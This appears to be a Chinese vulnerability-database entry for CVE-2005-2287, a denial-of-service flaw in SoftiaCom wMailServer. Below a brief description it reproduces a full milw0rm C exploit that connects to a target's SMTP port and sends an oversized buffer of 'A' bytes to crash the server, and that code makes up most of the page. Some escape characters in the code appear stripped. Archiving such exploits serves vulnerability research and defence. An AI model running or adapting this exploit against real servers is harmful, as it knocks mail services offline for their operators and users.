SoftiaCom wMailServer 拒绝服务漏洞
漏洞ID | 1108926 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2005-07-12 | 更新时间 | 2005-07-18 |
CVE编号 | CVE-2005-2287 |
CNNVD-ID | CNNVD-200507-200 |
漏洞平台 | Windows | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
SoftiacomwMailserver是一款用于Win平台的邮件服务软件。SoftiaComwMailServer1.0及2.0版本中存在拒绝服务漏洞。远程攻击者通过可能触发缓冲区溢出的具有前导空格的大型TCP数据包,可使系统拒绝服务(应用程序崩溃)。
|漏洞EXP
/*****************************************************************
wMailServer Remote D.o.S Exploit by Kozan
Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com
Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: [email protected]
*****************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32.lib")
char Buff[] =
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41";
int main(int argc, char *argv[])
{
fprintf(stdout, "wMailServer Remote D.o.S Exploit by Kozann");
fprintf(stdout, "Discovered by: fRoGGz - SecuBox Labsn");
fprintf(stdout, "Exploit Coded by: Kozann");
fprintf(stdout, "Credits to ATmaCA, fRoGGz, SecuBox Labsnn");
fprintf(stdout, "www.spyinstructors.com - [email protected]");
if(argc<2)
{
fprintf(stderr, "nnUsage: %s [Target IP]nn", argv[0]);
return -1;
}
WSADATA wsaData;
SOCKET sock;
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!n");
return -1;
}
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(25);
addr.sin_addr.s_addr = inet_addr(argv[1]);
memset(&(addr.sin_zero), ' ', 8);
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!n");
closesocket(sock);
return -1;
}
if( send(sock,Buff,strlen(Buff),0) == -1 )
{
fprintf(stderr, "DoS string could not sent!n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Operation completed...n");
closesocket(sock);
WSACleanup();
return 0;
}
// milw0rm.com [2005-07-12]
|受影响的产品
SoftiaCom WMailserver 2.0
SoftiaCom WMailserver 1.0
|参考资料
来源:BUGTRAQ
名称:20050712SoftiaComMailServerv2.0-DenialOfService
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112122500308722&w;=2
相关推荐: Netscape Enterprise Server Directory Indexing Vulnerability
Netscape Enterprise Server Directory Indexing Vulnerability 漏洞ID 1104246 漏洞类型 Configuration Error 发布时间 2000-03-17 更新时间 2000-03-17 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666